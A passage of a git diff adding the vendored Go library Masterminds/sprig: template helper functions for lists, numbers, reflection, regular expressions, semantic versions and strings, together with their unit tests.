reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + if l == 0 { + return nil + } + + nl := make([]interface{}, l-1) + for i := 0; i < l-1; i++ { + nl[i] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find initial on type %s", tp)) + } +} + +func sortAlpha(list interface{}) []string { + k := reflect.Indirect(reflect.ValueOf(list)).Kind() + switch k { + case reflect.Slice, reflect.Array: + a := strslice(list) + s := 
sort.StringSlice(a) + s.Sort() + return s + } + return []string{strval(list)} +} + +func reverse(v interface{}) []interface{} { + tp := reflect.TypeOf(v).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(v) + + l := l2.Len() + // We do not sort in place because the incoming array should not be altered. + nl := make([]interface{}, l) + for i := 0; i < l; i++ { + nl[l-i-1] = l2.Index(i).Interface() + } + + return nl + default: + panic(fmt.Sprintf("Cannot find reverse on type %s", tp)) + } +} + +func compact(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + nl := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !empty(item) { + nl = append(nl, item) + } + } + + return nl + default: + panic(fmt.Sprintf("Cannot compact on type %s", tp)) + } +} + +func uniq(list interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + dest := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !inList(dest, item) { + dest = append(dest, item) + } + } + + return dest + default: + panic(fmt.Sprintf("Cannot find uniq on type %s", tp)) + } +} + +func inList(haystack []interface{}, needle interface{}) bool { + for _, h := range haystack { + if reflect.DeepEqual(needle, h) { + return true + } + } + return false +} + +func without(list interface{}, omit ...interface{}) []interface{} { + tp := reflect.TypeOf(list).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(list) + + l := l2.Len() + res := []interface{}{} + var item interface{} + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if !inList(omit, item) { + res = append(res, item) + } + } + + return res + default: + 
panic(fmt.Sprintf("Cannot find without on type %s", tp)) + } +} + +func has(needle interface{}, haystack interface{}) bool { + tp := reflect.TypeOf(haystack).Kind() + switch tp { + case reflect.Slice, reflect.Array: + l2 := reflect.ValueOf(haystack) + var item interface{} + l := l2.Len() + for i := 0; i < l; i++ { + item = l2.Index(i).Interface() + if reflect.DeepEqual(needle, item) { + return true + } + } + + return false + default: + panic(fmt.Sprintf("Cannot find has on type %s", tp)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/list_test.go b/vendor/github.com/Masterminds/sprig/list_test.go new file mode 100644 index 0000000000..fa4cc76e57 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/list_test.go @@ -0,0 +1,157 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestTuple(t *testing.T) { + tpl := `{{$t := tuple 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}` + if err := runt(tpl, "foo1a"); err != nil { + t.Error(err) + } +} + +func TestList(t *testing.T) { + tpl := `{{$t := list 1 "a" "foo"}}{{index $t 2}}{{index $t 0 }}{{index $t 1}}` + if err := runt(tpl, "foo1a"); err != nil { + t.Error(err) + } +} + +func TestPush(t *testing.T) { + // Named `append` in the function map + tests := map[string]string{ + `{{ $t := tuple 1 2 3 }}{{ append $t 4 | len }}`: "4", + `{{ $t := tuple 1 2 3 4 }}{{ append $t 5 | join "-" }}`: "1-2-3-4-5", + `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ append $t "qux" | join "-" }}`: "foo-bar-baz-qux", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestPrepend(t *testing.T) { + tests := map[string]string{ + `{{ $t := tuple 1 2 3 }}{{ prepend $t 0 | len }}`: "4", + `{{ $t := tuple 1 2 3 4 }}{{ prepend $t 0 | join "-" }}`: "0-1-2-3-4", + `{{ $t := regexSplit "/" "foo/bar/baz" -1 }}{{ prepend $t "qux" | join "-" }}`: "qux-foo-bar-baz", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + 
+func TestFirst(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | first }}`: "1", + `{{ list | first }}`: "", + `{{ regexSplit "/src/" "foo/src/bar" -1 | first }}`: "foo", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} +func TestLast(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | last }}`: "3", + `{{ list | last }}`: "", + `{{ regexSplit "/src/" "foo/src/bar" -1 | last }}`: "bar", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestInitial(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | initial | len }}`: "2", + `{{ list 1 2 3 | initial | last }}`: "2", + `{{ list 1 2 3 | initial | first }}`: "1", + `{{ list | initial }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | initial }}`: "[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestRest(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | rest | len }}`: "2", + `{{ list 1 2 3 | rest | last }}`: "3", + `{{ list 1 2 3 | rest | first }}`: "2", + `{{ list | rest }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | rest }}`: "[bar baz]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestReverse(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | reverse | first }}`: "3", + `{{ list 1 2 3 | reverse | rest | first }}`: "2", + `{{ list 1 2 3 | reverse | last }}`: "1", + `{{ list 1 2 3 4 | reverse }}`: "[4 3 2 1]", + `{{ list 1 | reverse }}`: "[1]", + `{{ list | reverse }}`: "[]", + `{{ regexSplit "/" "foo/bar/baz" -1 | reverse }}`: "[baz bar foo]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestCompact(t *testing.T) { + tests := map[string]string{ + `{{ list 1 0 "" "hello" | compact }}`: `[1 hello]`, + `{{ list "" "" | compact }}`: `[]`, + `{{ list | compact }}`: `[]`, + `{{ regexSplit "/" "foo//bar" -1 | compact }}`: 
"[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestUniq(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 4 | uniq }}`: `[1 2 3 4]`, + `{{ list "a" "b" "c" "d" | uniq }}`: `[a b c d]`, + `{{ list 1 1 1 1 2 2 2 2 | uniq }}`: `[1 2]`, + `{{ list "foo" 1 1 1 1 "foo" "foo" | uniq }}`: `[foo 1]`, + `{{ list | uniq }}`: `[]`, + `{{ regexSplit "/" "foo/foo/bar" -1 | uniq }}`: "[foo bar]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestWithout(t *testing.T) { + tests := map[string]string{ + `{{ without (list 1 2 3 4) 1 }}`: `[2 3 4]`, + `{{ without (list "a" "b" "c" "d") "a" }}`: `[b c d]`, + `{{ without (list 1 1 1 1 2) 1 }}`: `[2]`, + `{{ without (list) 1 }}`: `[]`, + `{{ without (list 1 2 3) }}`: `[1 2 3]`, + `{{ without list }}`: `[]`, + `{{ without (regexSplit "/" "foo/bar/baz" -1 ) "foo" }}`: "[bar baz]", + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestHas(t *testing.T) { + tests := map[string]string{ + `{{ list 1 2 3 | has 1 }}`: `true`, + `{{ list 1 2 3 | has 4 }}`: `false`, + `{{ regexSplit "/" "foo/bar/baz" -1 | has "bar" }}`: `true`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/numeric.go b/vendor/github.com/Masterminds/sprig/numeric.go new file mode 100644 index 0000000000..209c62e53a --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/numeric.go @@ -0,0 +1,159 @@ +package sprig + +import ( + "math" + "reflect" + "strconv" +) + +// toFloat64 converts 64-bit floats +func toFloat64(v interface{}) float64 { + if str, ok := v.(string); ok { + iv, err := strconv.ParseFloat(str, 64) + if err != nil { + return 0 + } + return iv + } + + val := reflect.Indirect(reflect.ValueOf(v)) + switch val.Kind() { + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return float64(val.Int()) + 
case reflect.Uint8, reflect.Uint16, reflect.Uint32: + return float64(val.Uint()) + case reflect.Uint, reflect.Uint64: + return float64(val.Uint()) + case reflect.Float32, reflect.Float64: + return val.Float() + case reflect.Bool: + if val.Bool() == true { + return 1 + } + return 0 + default: + return 0 + } +} + +func toInt(v interface{}) int { + //It's not optimal. Bud I don't want duplicate toInt64 code. + return int(toInt64(v)) +} + +// toInt64 converts integer types to 64-bit integers +func toInt64(v interface{}) int64 { + if str, ok := v.(string); ok { + iv, err := strconv.ParseInt(str, 10, 64) + if err != nil { + return 0 + } + return iv + } + + val := reflect.Indirect(reflect.ValueOf(v)) + switch val.Kind() { + case reflect.Int8, reflect.Int16, reflect.Int32, reflect.Int64, reflect.Int: + return val.Int() + case reflect.Uint8, reflect.Uint16, reflect.Uint32: + return int64(val.Uint()) + case reflect.Uint, reflect.Uint64: + tv := val.Uint() + if tv <= math.MaxInt64 { + return int64(tv) + } + // TODO: What is the sensible thing to do here? 
+ return math.MaxInt64 + case reflect.Float32, reflect.Float64: + return int64(val.Float()) + case reflect.Bool: + if val.Bool() == true { + return 1 + } + return 0 + default: + return 0 + } +} + +func max(a interface{}, i ...interface{}) int64 { + aa := toInt64(a) + for _, b := range i { + bb := toInt64(b) + if bb > aa { + aa = bb + } + } + return aa +} + +func min(a interface{}, i ...interface{}) int64 { + aa := toInt64(a) + for _, b := range i { + bb := toInt64(b) + if bb < aa { + aa = bb + } + } + return aa +} + +func until(count int) []int { + step := 1 + if count < 0 { + step = -1 + } + return untilStep(0, count, step) +} + +func untilStep(start, stop, step int) []int { + v := []int{} + + if stop < start { + if step >= 0 { + return v + } + for i := start; i > stop; i += step { + v = append(v, i) + } + return v + } + + if step <= 0 { + return v + } + for i := start; i < stop; i += step { + v = append(v, i) + } + return v +} + +func floor(a interface{}) float64 { + aa := toFloat64(a) + return math.Floor(aa) +} + +func ceil(a interface{}) float64 { + aa := toFloat64(a) + return math.Ceil(aa) +} + +func round(a interface{}, p int, r_opt ...float64) float64 { + roundOn := .5 + if len(r_opt) > 0 { + roundOn = r_opt[0] + } + val := toFloat64(a) + places := toFloat64(p) + + var round float64 + pow := math.Pow(10, places) + digit := pow * val + _, div := math.Modf(digit) + if div >= roundOn { + round = math.Ceil(digit) + } else { + round = math.Floor(digit) + } + return round / pow +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/numeric_test.go b/vendor/github.com/Masterminds/sprig/numeric_test.go new file mode 100644 index 0000000000..2f41253052 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/numeric_test.go @@ -0,0 +1,205 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestUntil(t *testing.T) { + tests := map[string]string{ + `{{range $i, $e := until 5}}{{$i}}{{$e}}{{end}}`: 
"0011223344", + `{{range $i, $e := until -5}}{{$i}}{{$e}} {{end}}`: "00 1-1 2-2 3-3 4-4 ", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } +} +func TestUntilStep(t *testing.T) { + tests := map[string]string{ + `{{range $i, $e := untilStep 0 5 1}}{{$i}}{{$e}}{{end}}`: "0011223344", + `{{range $i, $e := untilStep 3 6 1}}{{$i}}{{$e}}{{end}}`: "031425", + `{{range $i, $e := untilStep 0 -10 -2}}{{$i}}{{$e}} {{end}}`: "00 1-2 2-4 3-6 4-8 ", + `{{range $i, $e := untilStep 3 0 1}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 99 0}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 99 -1}}{{$i}}{{$e}}{{end}}`: "", + `{{range $i, $e := untilStep 3 0 0}}{{$i}}{{$e}}{{end}}`: "", + } + for tpl, expect := range tests { + if err := runt(tpl, expect); err != nil { + t.Error(err) + } + } + +} +func TestBiggest(t *testing.T) { + tpl := `{{ biggest 1 2 3 345 5 6 7}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } + + tpl = `{{ max 345}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } +} +func TestMin(t *testing.T) { + tpl := `{{ min 1 2 3 345 5 6 7}}` + if err := runt(tpl, `1`); err != nil { + t.Error(err) + } + + tpl = `{{ min 345}}` + if err := runt(tpl, `345`); err != nil { + t.Error(err) + } +} + +func TestToFloat64(t *testing.T) { + target := float64(102) + if target != toFloat64(int8(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int32(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int16(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(int64(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64("102") { + t.Errorf("Expected 102") + } + if 0 != toFloat64("frankie") { + t.Errorf("Expected 0") + } + if target != toFloat64(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toFloat64(uint64(102)) { + t.Errorf("Expected 102") + } + if 
102.1234 != toFloat64(float64(102.1234)) { + t.Errorf("Expected 102.1234") + } + if 1 != toFloat64(true) { + t.Errorf("Expected 102") + } +} +func TestToInt64(t *testing.T) { + target := int64(102) + if target != toInt64(int8(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int32(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int16(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(int64(102)) { + t.Errorf("Expected 102") + } + if target != toInt64("102") { + t.Errorf("Expected 102") + } + if 0 != toInt64("frankie") { + t.Errorf("Expected 0") + } + if target != toInt64(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(uint64(102)) { + t.Errorf("Expected 102") + } + if target != toInt64(float64(102.1234)) { + t.Errorf("Expected 102") + } + if 1 != toInt64(true) { + t.Errorf("Expected 102") + } +} + +func TestToInt(t *testing.T) { + target := int(102) + if target != toInt(int8(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int32(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int16(102)) { + t.Errorf("Expected 102") + } + if target != toInt(int64(102)) { + t.Errorf("Expected 102") + } + if target != toInt("102") { + t.Errorf("Expected 102") + } + if 0 != toInt("frankie") { + t.Errorf("Expected 0") + } + if target != toInt(uint16(102)) { + t.Errorf("Expected 102") + } + if target != toInt(uint64(102)) { + t.Errorf("Expected 102") + } + if target != toInt(float64(102.1234)) { + t.Errorf("Expected 102") + } + if 1 != toInt(true) { + t.Errorf("Expected 102") + } +} + +func TestAdd(t *testing.T) { + tpl := `{{ 3 | add 1 2}}` + if err := runt(tpl, `6`); err != nil { + t.Error(err) + } +} + +func TestMul(t *testing.T) { + tpl := `{{ 1 | mul "2" 3 "4"}}` + if err := runt(tpl, `24`); err != nil { + t.Error(err) + } +} + +func TestCeil(t *testing.T){ + assert.Equal(t, 
123.0, ceil(123)) + assert.Equal(t, 123.0, ceil("123")) + assert.Equal(t, 124.0, ceil(123.01)) + assert.Equal(t, 124.0, ceil("123.01")) +} + +func TestFloor(t *testing.T){ + assert.Equal(t, 123.0, floor(123)) + assert.Equal(t, 123.0, floor("123")) + assert.Equal(t, 123.0, floor(123.9999)) + assert.Equal(t, 123.0, floor("123.9999")) +} + +func TestRound(t *testing.T){ + assert.Equal(t, 123.556, round(123.5555, 3)) + assert.Equal(t, 123.556, round("123.55555", 3)) + assert.Equal(t, 124.0, round(123.500001, 0)) + assert.Equal(t, 123.0, round(123.49999999, 0)) + assert.Equal(t, 123.23, round(123.2329999, 2, .3)) + assert.Equal(t, 123.24, round(123.233, 2, .3)) +} diff --git a/vendor/github.com/Masterminds/sprig/reflect.go b/vendor/github.com/Masterminds/sprig/reflect.go new file mode 100644 index 0000000000..8a65c132f0 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/reflect.go @@ -0,0 +1,28 @@ +package sprig + +import ( + "fmt" + "reflect" +) + +// typeIs returns true if the src is the type named in target. 
+func typeIs(target string, src interface{}) bool { + return target == typeOf(src) +} + +func typeIsLike(target string, src interface{}) bool { + t := typeOf(src) + return target == t || "*"+target == t +} + +func typeOf(src interface{}) string { + return fmt.Sprintf("%T", src) +} + +func kindIs(target string, src interface{}) bool { + return target == kindOf(src) +} + +func kindOf(src interface{}) string { + return reflect.ValueOf(src).Kind().String() +} diff --git a/vendor/github.com/Masterminds/sprig/reflect_test.go b/vendor/github.com/Masterminds/sprig/reflect_test.go new file mode 100644 index 0000000000..515fae9c4f --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/reflect_test.go @@ -0,0 +1,73 @@ +package sprig + +import ( + "testing" +) + +type fixtureTO struct { + Name, Value string +} + +func TestTypeOf(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{typeOf .}}` + if err := runtv(tpl, "*sprig.fixtureTO", f); err != nil { + t.Error(err) + } +} + +func TestKindOf(t *testing.T) { + tpl := `{{kindOf .}}` + + f := fixtureTO{"hello", "world"} + if err := runtv(tpl, "struct", f); err != nil { + t.Error(err) + } + + f2 := []string{"hello"} + if err := runtv(tpl, "slice", f2); err != nil { + t.Error(err) + } + + var f3 *fixtureTO = nil + if err := runtv(tpl, "ptr", f3); err != nil { + t.Error(err) + } +} + +func TestTypeIs(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{if typeIs "*sprig.fixtureTO" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + + f2 := "hello" + if err := runtv(tpl, "f", f2); err != nil { + t.Error(err) + } +} +func TestTypeIsLike(t *testing.T) { + f := "foo" + tpl := `{{if typeIsLike "string" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + + // Now make a pointer. Should still match. 
+ f2 := &f + if err := runtv(tpl, "t", f2); err != nil { + t.Error(err) + } +} +func TestKindIs(t *testing.T) { + f := &fixtureTO{"hello", "world"} + tpl := `{{if kindIs "ptr" .}}t{{else}}f{{end}}` + if err := runtv(tpl, "t", f); err != nil { + t.Error(err) + } + f2 := "hello" + if err := runtv(tpl, "f", f2); err != nil { + t.Error(err) + } +} diff --git a/vendor/github.com/Masterminds/sprig/regex.go b/vendor/github.com/Masterminds/sprig/regex.go new file mode 100644 index 0000000000..9fe033a6bd --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/regex.go @@ -0,0 +1,35 @@ +package sprig + +import ( + "regexp" +) + +func regexMatch(regex string, s string) bool { + match, _ := regexp.MatchString(regex, s) + return match +} + +func regexFindAll(regex string, s string, n int) []string { + r := regexp.MustCompile(regex) + return r.FindAllString(s, n) +} + +func regexFind(regex string, s string) string { + r := regexp.MustCompile(regex) + return r.FindString(s) +} + +func regexReplaceAll(regex string, s string, repl string) string { + r := regexp.MustCompile(regex) + return r.ReplaceAllString(s, repl) +} + +func regexReplaceAllLiteral(regex string, s string, repl string) string { + r := regexp.MustCompile(regex) + return r.ReplaceAllLiteralString(s, repl) +} + +func regexSplit(regex string, s string, n int) []string { + r := regexp.MustCompile(regex) + return r.Split(s, n) +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/regex_test.go b/vendor/github.com/Masterminds/sprig/regex_test.go new file mode 100644 index 0000000000..ccb87fe2f5 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/regex_test.go @@ -0,0 +1,61 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestRegexMatch(t *testing.T) { + regex := "[A-Za-z0-9._%+-]+@[A-Za-z0-9.-]+\\.[A-Za-z]{2,}" + + assert.True(t, regexMatch(regex, "test@acme.com")) + assert.True(t, regexMatch(regex, "Test@Acme.Com")) + assert.False(t, 
regexMatch(regex, "test")) + assert.False(t, regexMatch(regex, "test.com")) + assert.False(t, regexMatch(regex, "test@acme")) +} + +func TestRegexFindAll(t *testing.T){ + regex := "a{2}" + assert.Equal(t, 1, len(regexFindAll(regex, "aa", -1))) + assert.Equal(t, 1, len(regexFindAll(regex, "aaaaaaaa", 1))) + assert.Equal(t, 2, len(regexFindAll(regex, "aaaa", -1))) + assert.Equal(t, 0, len(regexFindAll(regex, "none", -1))) +} + +func TestRegexFindl(t *testing.T){ + regex := "fo.?" + assert.Equal(t, "foo", regexFind(regex, "foorbar")) + assert.Equal(t, "foo", regexFind(regex, "foo foe fome")) + assert.Equal(t, "", regexFind(regex, "none")) +} + +func TestRegexReplaceAll(t *testing.T){ + regex := "a(x*)b" + assert.Equal(t, "-T-T-", regexReplaceAll(regex,"-ab-axxb-", "T")) + assert.Equal(t, "--xx-", regexReplaceAll(regex,"-ab-axxb-", "$1")) + assert.Equal(t, "---", regexReplaceAll(regex,"-ab-axxb-", "$1W")) + assert.Equal(t, "-W-xxW-", regexReplaceAll(regex,"-ab-axxb-", "${1}W")) +} + +func TestRegexReplaceAllLiteral(t *testing.T){ + regex := "a(x*)b" + assert.Equal(t, "-T-T-", regexReplaceAllLiteral(regex,"-ab-axxb-", "T")) + assert.Equal(t, "-$1-$1-", regexReplaceAllLiteral(regex,"-ab-axxb-", "$1")) + assert.Equal(t, "-${1}-${1}-", regexReplaceAllLiteral(regex,"-ab-axxb-", "${1}")) +} + +func TestRegexSplit(t *testing.T){ + regex := "a" + assert.Equal(t, 4, len(regexSplit(regex,"banana", -1))) + assert.Equal(t, 0, len(regexSplit(regex,"banana", 0))) + assert.Equal(t, 1, len(regexSplit(regex,"banana", 1))) + assert.Equal(t, 2, len(regexSplit(regex,"banana", 2))) + + regex = "z+" + assert.Equal(t, 2, len(regexSplit(regex,"pizza", -1))) + assert.Equal(t, 0, len(regexSplit(regex,"pizza", 0))) + assert.Equal(t, 1, len(regexSplit(regex,"pizza", 1))) + assert.Equal(t, 2, len(regexSplit(regex,"pizza", 2))) +} \ No newline at end of file diff --git a/vendor/github.com/Masterminds/sprig/semver.go b/vendor/github.com/Masterminds/sprig/semver.go new file mode 100644 index 
0000000000..c2bf8a1fdf --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/semver.go @@ -0,0 +1,23 @@ +package sprig + +import ( + sv2 "github.com/Masterminds/semver" +) + +func semverCompare(constraint, version string) (bool, error) { + c, err := sv2.NewConstraint(constraint) + if err != nil { + return false, err + } + + v, err := sv2.NewVersion(version) + if err != nil { + return false, err + } + + return c.Check(v), nil +} + +func semver(version string) (*sv2.Version, error) { + return sv2.NewVersion(version) +} diff --git a/vendor/github.com/Masterminds/sprig/semver_test.go b/vendor/github.com/Masterminds/sprig/semver_test.go new file mode 100644 index 0000000000..53d3c8be9b --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/semver_test.go @@ -0,0 +1,31 @@ +package sprig + +import ( + "testing" + + "github.com/stretchr/testify/assert" +) + +func TestSemverCompare(t *testing.T) { + tests := map[string]string{ + `{{ semverCompare "1.2.3" "1.2.3" }}`: `true`, + `{{ semverCompare "^1.2.0" "1.2.3" }}`: `true`, + `{{ semverCompare "^1.2.0" "2.2.3" }}`: `false`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} + +func TestSemver(t *testing.T) { + tests := map[string]string{ + `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Prerelease }}`: "beta.1", + `{{ $s := semver "1.2.3-beta.1+c0ff33" }}{{ $s.Major}}`: "1", + `{{ semver "1.2.3" | (semver "1.2.3").Compare }}`: `0`, + `{{ semver "1.2.3" | (semver "1.3.3").Compare }}`: `1`, + `{{ semver "1.4.3" | (semver "1.2.3").Compare }}`: `-1`, + } + for tpl, expect := range tests { + assert.NoError(t, runt(tpl, expect)) + } +} diff --git a/vendor/github.com/Masterminds/sprig/strings.go b/vendor/github.com/Masterminds/sprig/strings.go new file mode 100644 index 0000000000..f6afa2ff9e --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/strings.go @@ -0,0 +1,201 @@ +package sprig + +import ( + "encoding/base32" + "encoding/base64" + "fmt" + "reflect" + "strconv" + "strings" + + util 
"github.com/aokoli/goutils" +) + +func base64encode(v string) string { + return base64.StdEncoding.EncodeToString([]byte(v)) +} + +func base64decode(v string) string { + data, err := base64.StdEncoding.DecodeString(v) + if err != nil { + return err.Error() + } + return string(data) +} + +func base32encode(v string) string { + return base32.StdEncoding.EncodeToString([]byte(v)) +} + +func base32decode(v string) string { + data, err := base32.StdEncoding.DecodeString(v) + if err != nil { + return err.Error() + } + return string(data) +} + +func abbrev(width int, s string) string { + if width < 4 { + return s + } + r, _ := util.Abbreviate(s, width) + return r +} + +func abbrevboth(left, right int, s string) string { + if right < 4 || left > 0 && right < 7 { + return s + } + r, _ := util.AbbreviateFull(s, left, right) + return r +} +func initials(s string) string { + // Wrap this just to eliminate the var args, which templates don't do well. + return util.Initials(s) +} + +func randAlphaNumeric(count int) string { + // It is not possible, it appears, to actually generate an error here. + r, _ := util.RandomAlphaNumeric(count) + return r +} + +func randAlpha(count int) string { + r, _ := util.RandomAlphabetic(count) + return r +} + +func randAscii(count int) string { + r, _ := util.RandomAscii(count) + return r +} + +func randNumeric(count int) string { + r, _ := util.RandomNumeric(count) + return r +} + +func untitle(str string) string { + return util.Uncapitalize(str) +} + +func quote(str ...interface{}) string { + out := make([]string, len(str)) + for i, s := range str { + out[i] = fmt.Sprintf("%q", strval(s)) + } + return strings.Join(out, " ") +} + +func squote(str ...interface{}) string { + out := make([]string, len(str)) + for i, s := range str { + out[i] = fmt.Sprintf("'%v'", s) + } + return strings.Join(out, " ") +} + +func cat(v ...interface{}) string { + r := strings.TrimSpace(strings.Repeat("%v ", len(v))) + return fmt.Sprintf(r, v...) 
+} + +func indent(spaces int, v string) string { + pad := strings.Repeat(" ", spaces) + return pad + strings.Replace(v, "\n", "\n"+pad, -1) +} + +func nindent(spaces int, v string) string { + return "\n" + indent(spaces, v) +} + +func replace(old, new, src string) string { + return strings.Replace(src, old, new, -1) +} + +func plural(one, many string, count int) string { + if count == 1 { + return one + } + return many +} + +func strslice(v interface{}) []string { + switch v := v.(type) { + case []string: + return v + case []interface{}: + l := len(v) + b := make([]string, l) + for i := 0; i < l; i++ { + b[i] = strval(v[i]) + } + return b + default: + val := reflect.ValueOf(v) + switch val.Kind() { + case reflect.Array, reflect.Slice: + l := val.Len() + b := make([]string, l) + for i := 0; i < l; i++ { + b[i] = strval(val.Index(i).Interface()) + } + return b + default: + return []string{strval(v)} + } + } +} + +func strval(v interface{}) string { + switch v := v.(type) { + case string: + return v + case []byte: + return string(v) + case error: + return v.Error() + case fmt.Stringer: + return v.String() + default: + return fmt.Sprintf("%v", v) + } +} + +func trunc(c int, s string) string { + if len(s) <= c { + return s + } + return s[0:c] +} + +func join(sep string, v interface{}) string { + return strings.Join(strslice(v), sep) +} + +func split(sep, orig string) map[string]string { + parts := strings.Split(orig, sep) + res := make(map[string]string, len(parts)) + for i, v := range parts { + res["_"+strconv.Itoa(i)] = v + } + return res +} + +// substring creates a substring of the given string. +// +// If start is < 0, this calls string[:length]. +// +// If start is >= 0 and length < 0, this calls string[start:] +// +// Otherwise, this calls string[start, length]. 
+func substring(start, length int, s string) string { + if start < 0 { + return s[:length] + } + if length < 0 { + return s[start:] + } + return s[start:length] +} diff --git a/vendor/github.com/Masterminds/sprig/strings_test.go b/vendor/github.com/Masterminds/sprig/strings_test.go new file mode 100644 index 0000000000..79bfcf5483 --- /dev/null +++ b/vendor/github.com/Masterminds/sprig/strings_test.go @@ -0,0 +1,227 @@ +package sprig + +import ( + "encoding/base32" + "encoding/base64" + "fmt" + "math/rand" + "testing" + + "github.com/aokoli/goutils" + "github.com/stretchr/testify/assert" +) + +func TestSubstr(t *testing.T) { + tpl := `{{"fooo" | substr 0 3 }}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestTrunc(t *testing.T) { + tpl := `{{ "foooooo" | trunc 3 }}` + if err := runt(tpl, "foo"); err != nil { + t.Error(err) + } +} + +func TestQuote(t *testing.T) { + tpl := `{{quote "a" "b" "c"}}` + if err := runt(tpl, `"a" "b" "c"`); err != nil { + t.Error(err) + } + tpl = `{{quote "\"a\"" "b" "c"}}` + if err := runt(tpl, `"\"a\"" "b" "c"`); err != nil { + t.Error(err) + } + tpl = `{{quote 1 2 3 }}` + if err := runt(tpl, `"1" "2" "3"`); err != nil { + t.Error(err) + } +} +func TestSquote(t *testing.T) { + tpl := `{{squote "a" "b" "c"}}` + if err := runt(tpl, `'a' 'b' 'c'`); err != nil { + t.Error(err) + } + tpl = `{{squote 1 2 3 }}` + if err := runt(tpl, `'1' '2' '3'`); err != nil { + t.Error(err) + } +} + +func TestContains(t *testing.T) { + // Mainly, we're just verifying the paramater order swap. 
